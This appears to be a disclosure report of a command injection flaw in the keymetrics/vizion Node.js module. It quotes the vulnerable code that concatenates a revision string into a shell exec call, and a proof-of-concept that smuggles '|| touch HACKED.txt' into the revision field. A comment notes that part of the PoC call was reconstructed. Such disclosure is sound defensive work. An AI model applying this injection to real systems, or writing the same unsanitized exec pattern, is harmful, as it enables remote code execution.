Code Injection in keymetrics/vizion


Reported on Apr 3rd 2020


The issue is a remote code execution (RCE) vulnerability triggerable via the vizion module.

This is possible because on this line the git reset --hard command is concatenated with unsanitized input:

  var command = cliCommand(args.folder, "git reset --hard " + args.revision);

The command variable is then passed to the exec function, declared as:

var exec = require('child_process').exec;

This means any attacker who controls the revision attribute of the object passed to <vizion_object>.revertTo() can append arbitrary shell commands, leading to RCE.

Steps To Reproduce

  1. First, make sure your git environment is configured correctly.
  2. Execute the following commands:
       mkdir vizion # Make a new directory in which to initialize git
       cd vizion
       git init
       echo "TEST_STRING" > test.txt # Create a file named "test.txt"
       git add test.txt # Add the new file to the index
       git commit
  3. Create a PoC file like this (in the vizion directory):
       // poc.js
       var vizion = require('vizion');
       // The opening of this call was lost in extraction and is reconstructed
       // here from the description above, which names revertTo().
       vizion.revertTo({
                  revision : 'f0a1d45936cf7a3c969e4caba96546fd23255796 || touch HACKED.txt',
                  folder : '.' },
                  function(err, data) {
                    if (err) console.error(err);
                  });
  4. Start the poc.js file: node poc.js
  5. A file named HACKED.txt will be created.